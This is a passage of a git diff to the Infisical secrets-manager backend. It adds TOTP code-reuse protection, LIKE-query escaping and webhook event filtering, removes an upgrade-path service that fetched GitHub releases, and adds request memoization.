KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { TKmsServiceFactory } from "../kms/kms-service"; @@ -20,13 +21,16 @@ type TTotpServiceFactoryDep = { userDAL: TUserDALFactory; totpConfigDAL: TTotpConfigDALFactory; kmsService: TKmsServiceFactory; + keyStore: Pick; }; +authenticator.options = { window: 1 }; + export type TTotpServiceFactory = ReturnType; const MAX_RECOVERY_CODE_LIMIT = 10; -export const totpServiceFactory = ({ totpConfigDAL, kmsService, userDAL }: TTotpServiceFactoryDep) => { +export const totpServiceFactory = ({ totpConfigDAL, kmsService, userDAL, keyStore }: TTotpServiceFactoryDep) => { const getUserTotpConfig = async ({ userId }: TGetUserTotpConfigDTO) => { const totpConfig = await totpConfigDAL.findOne({ userId @@ -176,6 +180,15 @@ export const totpServiceFactory = ({ totpConfigDAL, kmsService, userDAL }: TTotp message: "Invalid TOTP" }); } + + const claimed = await keyStore.setItemWithExpiryNX( + KeyStorePrefixes.UsedTotpCode(userId, totp), + KeyStoreTtls.UsedTotpCodeInSeconds, + "1" + ); + if (!claimed) { + throw new ForbiddenRequestError({ message: "Invalid TOTP" }); + } }; const verifyWithUserRecoveryCode = async ({ userId, recoveryCode }: TVerifyWithUserRecoveryCodeDTO) => { diff --git a/backend/src/services/upgrade-path/github-client.ts b/backend/src/services/upgrade-path/github-client.ts deleted file mode 100644 index 44aacca6daa..00000000000 --- a/backend/src/services/upgrade-path/github-client.ts +++ /dev/null @@ -1,242 +0,0 @@ -/* eslint-disable no-await-in-loop */ -import RE2 from "re2"; - -import { getConfig } from "@app/lib/config/env"; - -import { FormattedRelease, GitHubApiError, GitHubRelease } from "./types"; - -interface GitHubClientConfig { - token?: string; - timeout: number; - maxRetries: number; - retryDelay: number; - maxPagesPerRequest: number; - perPage: number; -} - -interface RateLimitInfo { - remaining: number; - reset: Date; - used: number; - limit: number; -} - -const getDefaultConfig = (): GitHubClientConfig => ({ - token: getConfig().GITHUB_API_TOKEN, - timeout: 30000, - maxRetries: 3, - retryDelay: 1000, - maxPagesPerRequest: 10, - perPage: 100 -}); - -const getHeaders = (token?: string): Record => { - const headers: Record = { - Accept: "application/vnd.github.v3+json", - "User-Agent": "Infisical-Upgrade-Path-Tool/1.0", - "X-GitHub-Api-Version": "2022-11-28" - }; - - if (token) { - headers.Authorization = `token ${token}`; - } - - return headers; -}; - -const delay = (ms: number): Promise => { - return new Promise((resolve) => { - setTimeout(resolve, ms); - }); -}; - -const isMainInfisicalRelease = (tagName: string): boolean => { - if ( - tagName.startsWith("infisical-cli/") || - tagName.startsWith("infisical-k8-operator/") || - tagName.startsWith("infisical-k8s-operator/") - ) { - return false; - } - - const patterns = [ - new RE2(/^v\d+\.\d+\.\d+/), - new RE2(/^\d+\.\d+\.\d+/), - new RE2(/^infisical\/v?\d+\.\d+\.\d+/), - new RE2(/^infisical\/v?\d+\.\d+\.\d+[-\w]*/) - ]; - - return patterns.some((pattern) => pattern.test(tagName)); -}; - -const normalizeVersion = (tagName: string): string => { - const versionMatch = tagName.match(new RE2(/(\d+\.\d+\.\d+(?:\.\d+)?)/)); - if (versionMatch) { - return `v${versionMatch[1]}`; - } - - if (tagName.startsWith("infisical/")) { - const withoutPrefix = tagName.replace(new RE2(/^infisical\//), ""); - return withoutPrefix.replace(new RE2(/-[a-zA-Z]+$/), ""); - } - return tagName.replace(new RE2(/-[a-zA-Z]+$/), ""); -}; - -const compareVersions = (v1: string, v2: string): number => { - const normalize = (v: string) => { - const versionMatch = v.match(new RE2(/(\d+\.\d+\.\d+(?:\.\d+)?)/)); - if (versionMatch) { - return versionMatch[1]; - } - if (v.startsWith("infisical/")) { - return v.replace(new RE2(/^infisical\/v?/), "").replace(new RE2(/-[a-zA-Z]+$/), ""); - } - return v.replace(new RE2(/^v/), "").replace(new RE2(/-[a-zA-Z]+$/), ""); - }; - - const clean1 = normalize(v1); - const clean2 = normalize(v2); - - const parts1 = clean1.split(".").map(Number); - const parts2 = clean2.split(".").map(Number); - - const maxLength = Math.max(parts1.length, parts2.length); - while (parts1.length < maxLength) parts1.push(0); - while (parts2.length < maxLength) parts2.push(0); - - for (let i = 0; i < maxLength; i += 1) { - if (parts1[i] > parts2[i]) return 1; - if (parts1[i] < parts2[i]) return -1; - } - return 0; -}; - -const isVersionAtLeastMinimum = (tagName: string, minimumVersion = "0.147.0"): boolean => { - return compareVersions(tagName, minimumVersion) >= 0; -}; - -const makeRequest = async ( - url: string, - config: GitHubClientConfig, - retryCount = 0 -): Promise<{ data: T; rateLimit: RateLimitInfo }> => { - const controller = new AbortController(); - const timeout = setTimeout(() => controller.abort(), config.timeout); - - try { - const response = await fetch(url, { - headers: getHeaders(config.token), - signal: controller.signal - }); - - clearTimeout(timeout); - - const rateLimit: RateLimitInfo = { - remaining: parseInt(response.headers.get("X-RateLimit-Remaining") || "0", 10), - reset: new Date(parseInt(response.headers.get("X-RateLimit-Reset") || "0", 10) * 1000), - used: parseInt(response.headers.get("X-RateLimit-Used") || "0", 10), - limit: parseInt(response.headers.get("X-RateLimit-Limit") || "5000", 10) - }; - - if (!response.ok) { - const error: GitHubApiError = new Error(`GitHub API error: ${response.status}`); - error.status = response.status; - error.headers = response.headers; - - if (response.status === 403) { - const resetTime = rateLimit.reset.toISOString(); - error.message = `GitHub API rate limit exceeded. Remaining: ${rateLimit.remaining}, Reset at: ${resetTime}. ${ - !config.token ? "Consider setting GITHUB_TOKEN environment variable." : "" - }`; - } - - if (retryCount < config.maxRetries && (response.status >= 500 || response.status === 403)) { - await delay(config.retryDelay * 2 ** retryCount); - return await makeRequest(url, config, retryCount + 1); - } - - throw error; - } - - const data = (await response.json()) as T; - return { data, rateLimit }; - } catch (error) { - clearTimeout(timeout); - - if (error instanceof Error && error.name === "AbortError") { - if (retryCount < config.maxRetries) { - await delay(config.retryDelay * 2 ** retryCount); - return await makeRequest(url, config, retryCount + 1); - } - throw new Error(`Request timeout after ${config.timeout}ms`); - } - - if (retryCount < config.maxRetries && !(error as GitHubApiError).status) { - await delay(config.retryDelay * 2 ** retryCount); - return await makeRequest(url, config, retryCount + 1); - } - - throw error; - } -}; - -export const fetchReleases = async (includePrerelease = false): Promise => { - const config = getDefaultConfig(); - const allReleases: GitHubRelease[] = []; - let page = 1; - let hasMorePages = true; - let reachedMinimumVersion = false; - - const maxConcurrentRequests = Math.min(3, config.maxPagesPerRequest); - - while (hasMorePages && page <= config.maxPagesPerRequest && !reachedMinimumVersion) { - const requests: Promise<{ data: GitHubRelease[]; rateLimit: RateLimitInfo }>[] = []; - - for (let i = 0; i < maxConcurrentRequests && page <= config.maxPagesPerRequest; i += 1, page += 1) { - const url = `https://api.github.com/repos/Infisical/infisical/releases?page=${page}&per_page=${config.perPage}`; - requests.push(makeRequest(url, config)); - } - - const results = await Promise.allSettled(requests); - let hasData = false; - - for (const result of results) { - if (result.status === "fulfilled") { - const { data } = result.value; - if (data.length > 0) { - for (const release of data) { - if (!release.draft && isMainInfisicalRelease(release.tag_name)) { - if (isVersionAtLeastMinimum(release.tag_name)) { - allReleases.push(release); - } else { - reachedMinimumVersion = true; - break; - } - } - } - hasData = true; - } - } - } - - if (!hasData || results.every((r) => r.status === "fulfilled" && r.value.data.length < config.perPage)) { - hasMorePages = false; - } - } - - const formattedReleases = allReleases - .map( - (release): FormattedRelease => ({ - tagName: release.tag_name, - normalizedTagName: normalizeVersion(release.tag_name), - name: release.name, - body: release.body, - publishedAt: release.published_at, - prerelease: release.prerelease, - draft: release.draft - }) - ) - .sort((a, b) => new Date(b.publishedAt).getTime() - new Date(a.publishedAt).getTime()); - - return formattedReleases.filter((release) => includePrerelease || !release.prerelease); -}; diff --git a/backend/src/services/upgrade-path/index.ts b/backend/src/services/upgrade-path/index.ts deleted file mode 100644 index 1000e2bfa48..00000000000 --- a/backend/src/services/upgrade-path/index.ts +++ /dev/null @@ -1,2 +0,0 @@ -export type { TUpgradePathService, TUpgradePathServiceFactory } from "./upgrade-path-service"; -export { upgradePathServiceFactory } from "./upgrade-path-service"; diff --git a/backend/src/services/upgrade-path/types.ts b/backend/src/services/upgrade-path/types.ts deleted file mode 100644 index 83d3d15469c..00000000000 --- a/backend/src/services/upgrade-path/types.ts +++ /dev/null @@ -1,66 +0,0 @@ -export interface GitHubRelease { - tag_name: string; - name: string; - body: string; - published_at: string; - prerelease: boolean; - draft: boolean; -} - -export interface FormattedRelease { - tagName: string; - normalizedTagName: string; - name: string; - body: string; - publishedAt: string; - prerelease: boolean; - draft: boolean; -} - -export interface BreakingChange { - title: string; - description: string; - action: string; -} - -export interface VersionConfig { - breaking_changes?: BreakingChange[]; - db_schema_changes?: string; - notes?: string; -} - -export interface UpgradePathConfig { - versions?: Record; -} - -export interface UpgradePathResult { - path: Array<{ - version: string; - name: string; - publishedAt: string; - prerelease: boolean; - }>; - breakingChanges: Array<{ - version: string; - changes: BreakingChange[]; - }>; - features: Array<{ - version: string; - name: string; - body: string; - publishedAt: string; - }>; - hasDbMigration: boolean; - config: Record; -} - -export interface GitHubApiError extends Error { - status?: number; - headers?: Headers; -} - -export interface CacheEntry { - data: T; - timestamp: number; - ttl: number; -} diff --git a/backend/src/services/upgrade-path/upgrade-path-schemas.ts b/backend/src/services/upgrade-path/upgrade-path-schemas.ts deleted file mode 100644 index a283505c7d8..00000000000 --- a/backend/src/services/upgrade-path/upgrade-path-schemas.ts +++ /dev/null @@ -1,24 +0,0 @@ -import RE2 from "re2"; -import { z } from "zod"; - -export const versionSchema = z - .string() - .min(1) - .max(50) - .regex(new RE2(/^[a-zA-Z0-9._/-]+$/), "Invalid version format"); - -export const breakingChangeSchema = z.object({ - title: z.string().min(1).max(200), - description: z.string().min(1).max(1000), - action: z.string().min(1).max(500) -}); - -export const versionConfigSchema = z.object({ - breaking_changes: z.array(breakingChangeSchema).optional(), - db_schema_changes: z.string().max(1000).optional(), - notes: z.string().max(2000).optional() -}); - -export const upgradePathConfigSchema = z.object({ - versions: z.record(versionSchema, versionConfigSchema).optional().nullable() -}); diff --git a/backend/src/services/upgrade-path/upgrade-path-service.ts b/backend/src/services/upgrade-path/upgrade-path-service.ts deleted file mode 100644 index e24743fc8fb..00000000000 --- a/backend/src/services/upgrade-path/upgrade-path-service.ts +++ /dev/null @@ -1,254 +0,0 @@ -import { readFile } from "fs/promises"; -import * as yaml from "js-yaml"; -import * as path from "path"; -import RE2 from "re2"; -import { z } from "zod"; - -import { TKeyStoreFactory } from "@app/keystore/keystore"; -import { withCache } from "@app/lib/cache/with-cache"; -import { logger } from "@app/lib/logger"; - -import { fetchReleases } from "./github-client"; -import { BreakingChange, FormattedRelease, UpgradePathConfig, UpgradePathResult } from "./types"; -import { versionConfigSchema, versionSchema } from "./upgrade-path-schemas"; - -export type TUpgradePathServiceFactory = { - keyStore: TKeyStoreFactory; -}; -export type TUpgradePathService = ReturnType; - -interface CalculateUpgradePathParams { - fromVersion: string; - toVersion: string; -} - -const UPGRADE_PATH_CONFIG_KEY = "upgrade-path:config"; -const UPGRADE_PATH_CONFIG_TTL = 24 * 60 * 60; // 24 hours -const UPGRADE_PATH_CACHE_TTL = 60 * 60; // 1 hour - -export const upgradePathServiceFactory = ({ keyStore }: TUpgradePathServiceFactory) => { - const sanitizeCacheKey = (key: string): string => { - return key.replace(new RE2(/[^a-zA-Z0-9\-:._]/g), "_"); - }; - const getGitHubReleases = async (): Promise => { - const cacheKey = "upgrade-path:releases"; - - try { - const cached = await keyStore.getItem(cacheKey); - if (cached) { - const cachedReleases = JSON.parse(cached) as FormattedRelease[]; - if (cachedReleases.length > 0) { - return cachedReleases; - } - } - } catch (error) { - logger.error(error, "Failed to retrieve releases from cache"); - } - - try { - const releases = await fetchReleases(false); - const filteredReleases = releases.filter((v) => !v.tagName.includes("nightly")); - - await keyStore.setItemWithExpiry(cacheKey, 24 * 60 * 60, JSON.stringify(filteredReleases)); - return filteredReleases; - } catch (error) { - throw new Error(`GitHub releases unavailable: ${error instanceof Error ? error.message : "Unknown error"}`); - } - }; - - const getUpgradePathConfig = async (): Promise>> => { - return withCache({ - keyStore, - key: UPGRADE_PATH_CONFIG_KEY, - ttlSeconds: UPGRADE_PATH_CONFIG_TTL, - fetcher: async () => { - try { - const yamlPath = path.join(__dirname, "..", "..", "..", "upgrade-path.yaml"); - const resolvedPath = path.resolve(yamlPath); - const expectedBaseDir = path.resolve(__dirname, "..", "..", ".."); - if (!resolvedPath.startsWith(expectedBaseDir)) { - throw new Error("Invalid configuration file path"); - } - - const yamlContent = await readFile(yamlPath, "utf8"); - - if (yamlContent.length > 1024 * 1024) { - throw new Error("Config file too large"); - } - - const config = yaml.load(yamlContent, { schema: yaml.FAILSAFE_SCHEMA }) as UpgradePathConfig; - return config?.versions || {}; - } catch (error) { - if (error instanceof Error && "code" in error && error.code === "ENOENT") { - return {}; - } - throw new Error(`Config load failed: ${error instanceof Error ? error.message : "Unknown error"}`); - } - } - }); - }; - - const normalizeVersion = (version: string): string => { - const versionRegex = new RE2(/(\d+\.\d+\.\d+(?:\.\d+)?)/); - const versionMatch = version.match(versionRegex); - if (versionMatch) { - return versionMatch[1]; - } - - if (version.startsWith("infisical/")) { - return version.replace(new RE2(/^infisical\/v?/), "").replace(new RE2(/-[a-zA-Z]+$/), ""); - } - return version.replace(new RE2(/^v/), "").replace(new RE2(/-[a-zA-Z]+$/), ""); - }; - - const validateParams = (params: CalculateUpgradePathParams) => { - const { fromVersion, toVersion } = params; - - versionSchema.parse(fromVersion); - versionSchema.parse(toVersion); - - if (fromVersion === toVersion) { - throw new Error("Versions cannot be identical"); - } - - if (fromVersion.includes("nightly") || toVersion.includes("nightly")) { - throw new Error("Nightly releases are not supported for upgrade path calculation"); - } - - return { fromVersion, toVersion }; - }; - - const calculateUpgradePath = async (params: CalculateUpgradePathParams): Promise => { - const { fromVersion, toVersion } = validateParams(params); - const cacheKey = sanitizeCacheKey(`upgrade-path:${fromVersion}:${toVersion}`); - - return withCache({ - keyStore, - key: cacheKey, - ttlSeconds: UPGRADE_PATH_CACHE_TTL, - fetcher: async () => { - const [releases, config] = await Promise.all([getGitHubReleases(), getUpgradePathConfig()]); - - const cleanFrom = normalizeVersion(fromVersion); - const cleanTo = normalizeVersion(toVersion); - - const compareVersions = (v1: string, v2: string): number => { - const normalize = (v: string) => normalizeVersion(v); - const clean1 = normalize(v1); - const clean2 = normalize(v2); - - const parts1 = clean1.split(".").map(Number); - const parts2 = clean2.split(".").map(Number); - - const maxLength = Math.max(parts1.length, parts2.length); - while (parts1.length < maxLength) parts1.push(0); - while (parts2.length < maxLength) parts2.push(0); - - for (let i = 0; i < maxLength; i += 1) { - if (parts1[i] > parts2[i]) return 1; - if (parts1[i] < parts2[i]) return -1; - } - return 0; - }; - - if (compareVersions(cleanFrom, cleanTo) >= 0) { - throw new Error("fromVersion must be older than toVersion"); - } - - const fromIdx = releases.findIndex((r) => normalizeVersion(r.normalizedTagName) === cleanFrom); - const toIdx = releases.findIndex((r) => normalizeVersion(r.normalizedTagName) === cleanTo); - - let upgradePath: FormattedRelease[] = []; - const filteredPath: FormattedRelease[] = []; - - if (fromIdx !== -1 && toIdx !== -1) { - if (fromIdx <= toIdx) throw new Error("Invalid version order"); - upgradePath = releases.slice(toIdx, fromIdx + 1).reverse(); - const [first, last] = [upgradePath[0], upgradePath[upgradePath.length - 1]]; - - filteredPath.push(first); - if (last !== first) filteredPath.push(last); - } - - const breakingChanges: Array<{ version: string; changes: BreakingChange[] }> = []; - const features: Array<{ version: string; name: string; body: string; publishedAt: string }> = []; - let hasDbMigration = false; - - const isVersionInRange = (version: string, fromVer: string, toVer: string): boolean => { - const versionComp = compareVersions(version, fromVer); - const toVersionComp = compareVersions(version, toVer); - return versionComp > 0 && toVersionComp < 0; - }; - - Object.keys(config).forEach((configVersion) => { - const versionConfig = config[configVersion]; - if (versionConfig?.breaking_changes?.length) { - if (isVersionInRange(configVersion, cleanFrom, cleanTo)) { - breakingChanges.push({ - version: configVersion, - changes: versionConfig.breaking_changes - }); - } - } - }); - for (let i = 0; i < upgradePath.length; i += 1) { - const version = upgradePath[i]; - const isFromVersion = normalizeVersion(version.normalizedTagName) === cleanFrom; - - if (!isFromVersion) { - const versionNumber = normalizeVersion(version.tagName); - const possibleKeys = [ - version.tagName, - version.normalizedTagName, - versionNumber, - `v${versionNumber}`, - version.tagName.replace(new RE2(/^infisical\//), ""), - version.tagName.replace(new RE2(/^infisical\/v?/), "").replace(new RE2(/-[a-zA-Z]+$/), "") - ]; - - for (const key of possibleKeys) { - const versionConfig = config[key]; - if ( - versionConfig?.db_schema_changes && - typeof versionConfig.db_schema_changes === "string" && - versionConfig.db_schema_changes.trim() - ) { - hasDbMigration = true; - break; - } - } - } - - // Collect release notes and features - if (version.body) { - features.push({ - version: version.tagName, - name: version.name, - body: version.body, - publishedAt: version.publishedAt - }); - } - } - - return { - path: filteredPath.map((r) => ({ - version: r.tagName, - name: r.name, - publishedAt: r.publishedAt, - prerelease: r.prerelease - })), - breakingChanges, - features, - hasDbMigration, - config - }; - } - }); - }; - - return { - getGitHubReleases, - getUpgradePathConfig, - calculateUpgradePath: (fromVersion: string, toVersion: string) => calculateUpgradePath({ fromVersion, toVersion }) - }; -}; diff --git a/backend/src/services/user-engagement/user-engagement-service.ts b/backend/src/services/user-engagement/user-engagement-service.ts index b1467290362..0e33d1e39e1 100644 --- a/backend/src/services/user-engagement/user-engagement-service.ts +++ b/backend/src/services/user-engagement/user-engagement-service.ts @@ -2,6 +2,8 @@ import axios from "axios"; import { getConfig } from "@app/lib/config/env"; import { InternalServerError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "../org/org-dal"; import { TUserDALFactory } from "../user/user-dal"; @@ -16,7 +18,7 @@ export type TUserEngagementServiceFactory = ReturnType { const createUserWish = async (userId: string, orgId: string, text: string) => { const user = await userDAL.findById(userId); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); const appCfg = getConfig(); if (!appCfg.PYLON_API_KEY) { diff --git a/backend/src/services/user/user-dal.ts b/backend/src/services/user/user-dal.ts index 6de06d6fa4c..145766f1021 100644 --- a/backend/src/services/user/user-dal.ts +++ b/backend/src/services/user/user-dal.ts @@ -13,6 +13,7 @@ import { UsersSchema } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; export type TUserDALFactory = ReturnType; @@ -38,10 +39,10 @@ export const userDALFactory = (db: TDbClient) => { if (searchTerm) { query = query.where((qb) => { void qb - .whereILike("email", `%${searchTerm}%`) - .orWhereILike("firstName", `%${searchTerm}%`) - .orWhereILike("lastName", `%${searchTerm}%`) - .orWhereRaw('lower("username") like ?', `%${searchTerm}%`); + .whereILike("email", `%${sanitizeSqlLikeString(searchTerm)}%`) + .orWhereILike("firstName", `%${sanitizeSqlLikeString(searchTerm)}%`) + .orWhereILike("lastName", `%${sanitizeSqlLikeString(searchTerm)}%`) + .orWhereRaw('lower("username") like ?', `%${sanitizeSqlLikeString(searchTerm)}%`); }); } @@ -91,7 +92,9 @@ export const userDALFactory = (db: TDbClient) => { isGhost: false }) .whereIn(`${TableName.Users}.id`, userIds) - .join(TableName.UserEncryptionKey, `${TableName.Users}.id`, `${TableName.UserEncryptionKey}.userId`); + .leftJoin(TableName.UserEncryptionKey, `${TableName.Users}.id`, `${TableName.UserEncryptionKey}.userId`) + .select(selectAllTableCols(TableName.Users)) + .select(db.ref("publicKey").withSchema(TableName.UserEncryptionKey)); } catch (error) { throw new DatabaseError({ error, name: "Find user enc by user ids batch" }); } diff --git a/backend/src/services/user/user-service.ts b/backend/src/services/user/user-service.ts index c998b272621..75351c2bb42 100644 --- a/backend/src/services/user/user-service.ts +++ b/backend/src/services/user/user-service.ts @@ -87,7 +87,7 @@ export const userServiceFactory = ({ await smtpService.sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${userToken}`, recipients: [user.email], substitutions: { code: userToken diff --git a/backend/src/services/webhook/webhook-fns.ts b/backend/src/services/webhook/webhook-fns.ts index 05fa9114ef8..57fd7d464d2 100644 --- a/backend/src/services/webhook/webhook-fns.ts +++ b/backend/src/services/webhook/webhook-fns.ts @@ -7,6 +7,8 @@ import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto/cryptography"; import { NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { ActorType } from "@app/services/auth/auth-type"; @@ -248,91 +250,22 @@ export const getWebhookPayload = (event: TWebhookPayloads) => { } } - const { projectName, projectId, environment, secretPath, type, reminderNote, secretName } = event.payload; - - switch (type) { - case WebhookType.SLACK: - return { - text: "You have a secret reminder", - attachments: [ - { - color: "#E7F256", - fields: [ - { - title: "Project", - value: projectName, - short: false - }, - { - title: "Environment", - value: environment, - short: false - }, - { - title: "Secret Path", - value: secretPath, - short: false - }, - { - title: "Secret Name", - value: secretName, - short: false - }, - { - title: "Reminder Note", - value: reminderNote, - short: false - } - ] - } - ] - }; - case WebhookType.MICROSOFT_TEAMS: - return { - type: "message", - attachments: [ - { - contentType: "application/vnd.microsoft.card.adaptive", - contentUrl: null, - content: { - type: "AdaptiveCard", - version: "1.2", - body: [ - { - type: "TextBlock", - size: "Medium", - weight: "Bolder", - text: "You have a secret reminder" - }, - { - type: "FactSet", - facts: [ - { title: "Project", value: projectName || "" }, - { title: "Environment", value: environment }, - { title: "Secret Path", value: secretPath || "" }, - { title: "Reminder Note", value: reminderNote || "" } - ] - } - ] - } - } - ] - }; - case WebhookType.GENERAL: - default: - return { - event: event.type, - project: { - workspaceId: projectId, - projectId, - projectName, - environment, - secretPath, - secretName, - reminderNote - } - }; + if (event.type === WebhookEvents.TestEvent) { + const { projectName, projectId, environment, secretPath } = event.payload; + return { + event: event.type, + project: { + workspaceId: projectId, + projectId, + projectName, + environment, + secretPath + } + }; } + + logger.warn({ event }, "Unhandled webhook event"); + return null; }; export type TFnTriggerWebhookDTO = { @@ -361,15 +294,18 @@ export const fnTriggerWebhook = async ({ auditLogService }: TFnTriggerWebhookDTO) => { const webhooks = await webhookDAL.findAllWebhooks(projectId, environment); - const toBeTriggeredHooks = webhooks.filter( - ({ secretPath: hookSecretPath, isDisabled }) => - !isDisabled && picomatch.isMatch(secretPath, hookSecretPath, { strictSlashes: false }) - ); + const toBeTriggeredHooks = webhooks.filter(({ secretPath: hookSecretPath, isDisabled, filteredEvents }) => { + const isEventSubscribed = !filteredEvents || filteredEvents.length === 0 || filteredEvents.includes(event.type); + + return !isDisabled && picomatch.isMatch(secretPath, hookSecretPath, { strictSlashes: false }) && isEventSubscribed; + }); if (!toBeTriggeredHooks.length) return; logger.info({ environment, secretPath, projectId }, "Secret webhook job started"); let { projectName } = event.payload; if (!projectName) { - const project = await projectDAL.findById(event.payload.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(event.payload.projectId), () => + projectDAL.findById(event.payload.projectId) + ); projectName = project.name; } @@ -379,8 +315,9 @@ export const fnTriggerWebhook = async ({ type: event.type, payload: { ...event.payload, type: hook.type, projectName } } as TWebhookPayloads; - - return triggerWebhookRequest(hook, secretManagerDecryptor, getWebhookPayload(formattedEvent)); + const payload = getWebhookPayload(formattedEvent); + if (!payload) return; + return triggerWebhookRequest(hook, secretManagerDecryptor, payload); }) ); diff --git a/backend/src/services/webhook/webhook-service.ts b/backend/src/services/webhook/webhook-service.ts index 90187dda66c..e603f3872f7 100644 --- a/backend/src/services/webhook/webhook-service.ts +++ b/backend/src/services/webhook/webhook-service.ts @@ -3,7 +3,9 @@ import { ForbiddenError } from "@casl/ability"; import { ActionProjectType, TWebhooksInsert } from "@app/db/schemas"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; -import { NotFoundError } from "@app/lib/errors"; +import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { TKmsServiceFactory } from "../kms/kms-service"; @@ -13,9 +15,11 @@ import { TProjectEnvDALFactory } from "../project-env/project-env-dal"; import { TWebhookDALFactory } from "./webhook-dal"; import { decryptWebhookDetails, getWebhookPayload, triggerWebhookRequest } from "./webhook-fns"; import { + SUBSCRIBABLE_WEBHOOK_EVENTS, TCreateWebhookDTO, TDeleteWebhookDTO, TListWebhookDTO, + TSubscribableWebhookEvent, TTestWebhookDTO, TUpdateWebhookDTO, WebhookEvents @@ -38,6 +42,18 @@ export const webhookServiceFactory = ({ projectDAL, kmsService }: TWebhookServiceFactoryDep) => { + const subscribableEvents = new Set(SUBSCRIBABLE_WEBHOOK_EVENTS); + + // `eventsFilter` on the API mirrors the DB's `filteredEvents` column: both are the allowlist + // of events that should trigger the webhook. Empty array => no events are filtered out + // (webhook fires on everything subscribable). + const withEventsFilter = (webhook: T) => ({ + ...webhook, + eventsFilter: (webhook.filteredEvents ?? []) + .filter((eventName): eventName is TSubscribableWebhookEvent => subscribableEvents.has(eventName)) + .map((eventName) => ({ eventName })) + }); + const createWebhook = async ({ actor, actorId, @@ -48,7 +64,8 @@ export const webhookServiceFactory = ({ environment, secretPath, webhookSecretKey, - type + type, + eventsFilter }: TCreateWebhookDTO) => { const { permission } = await permissionService.getProjectPermission({ actor, @@ -70,12 +87,16 @@ export const webhookServiceFactory = ({ type: KmsDataKey.SecretManager, projectId }); + + const filteredEvents = eventsFilter?.map((e) => e.eventName) ?? []; + const insertDoc: TWebhooksInsert = { envId: env.id, isDisabled: false, secretPath: secretPath || "/", type, - encryptedUrl: secretManagerEncryptor({ plainText: Buffer.from(webhookUrl) }).cipherTextBlob + encryptedUrl: secretManagerEncryptor({ plainText: Buffer.from(webhookUrl) }).cipherTextBlob, + filteredEvents }; if (webhookSecretKey) { @@ -83,10 +104,18 @@ export const webhookServiceFactory = ({ } const webhook = await webhookDAL.create(insertDoc); - return { ...webhook, projectId, environment: env }; + return { ...withEventsFilter(webhook), projectId, environment: env }; }; - const updateWebhook = async ({ actorId, actor, actorOrgId, actorAuthMethod, id, isDisabled }: TUpdateWebhookDTO) => { + const updateWebhook = async ({ + actorId, + actor, + actorOrgId, + actorAuthMethod, + id, + isDisabled, + eventsFilter + }: TUpdateWebhookDTO) => { const webhook = await webhookDAL.findById(id); if (!webhook) throw new NotFoundError({ message: `Webhook with ID '${id}' not found` }); @@ -100,8 +129,15 @@ export const webhookServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Edit, ProjectPermissionSub.Webhooks); - const updatedWebhook = await webhookDAL.updateById(id, { isDisabled }); - return { ...webhook, ...updatedWebhook }; + const filteredEvents = eventsFilter?.map((e) => e.eventName); + + const updateData = { + ...(isDisabled !== undefined ? { isDisabled } : {}), + ...(filteredEvents !== undefined ? { filteredEvents } : {}) + }; + + const updatedWebhook = await webhookDAL.updateById(id, updateData); + return withEventsFilter({ ...webhook, ...updatedWebhook }); }; const deleteWebhook = async ({ id, actor, actorId, actorAuthMethod, actorOrgId }: TDeleteWebhookDTO) => { @@ -119,7 +155,7 @@ export const webhookServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Delete, ProjectPermissionSub.Webhooks); const deletedWebhook = await webhookDAL.deleteById(id); - return { ...webhook, ...deletedWebhook }; + return withEventsFilter({ ...webhook, ...deletedWebhook }); }; const testWebhook = async ({ id, actor, actorId, actorAuthMethod, actorOrgId }: TTestWebhookDTO) => { @@ -135,7 +171,9 @@ export const webhookServiceFactory = ({ actionProjectType: ActionProjectType.Any }); - const project = await projectDAL.findById(webhook.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(webhook.projectId), () => + projectDAL.findById(webhook.projectId) + ); const { decryptor: secretManagerDecryptor } = await kmsService.createCipherPairWithDataKey({ type: KmsDataKey.SecretManager, projectId: project.id @@ -144,19 +182,23 @@ export const webhookServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Read, ProjectPermissionSub.Webhooks); let webhookError: string | undefined; try { + const payload = getWebhookPayload({ + type: WebhookEvents.TestEvent, + payload: { + projectName: project.name, + projectId: webhook.projectId, + environment: webhook.environment.slug, + secretPath: webhook.secretPath, + type: webhook.type + } + }); + + if (!payload) throw new BadRequestError({ message: "Failed to get webhook payload for test event" }); + await triggerWebhookRequest( webhook, (value) => secretManagerDecryptor({ cipherTextBlob: value }).toString(), - getWebhookPayload({ - type: "test" as WebhookEvents.SecretModified, - payload: { - projectName: project.name, - projectId: webhook.projectId, - environment: webhook.environment.slug, - secretPath: webhook.secretPath, - type: webhook.type - } - }) + payload ); } catch (err) { webhookError = (err as Error).message; @@ -166,7 +208,7 @@ export const webhookServiceFactory = ({ lastStatus: isSuccess ? "success" : "failed", lastRunErrorMessage: isSuccess ? null : webhookError }); - return { ...webhook, ...updatedWebhook }; + return withEventsFilter({ ...webhook, ...updatedWebhook }); }; const listWebhooks = async ({ @@ -197,7 +239,7 @@ export const webhookServiceFactory = ({ return webhooks.map((w) => 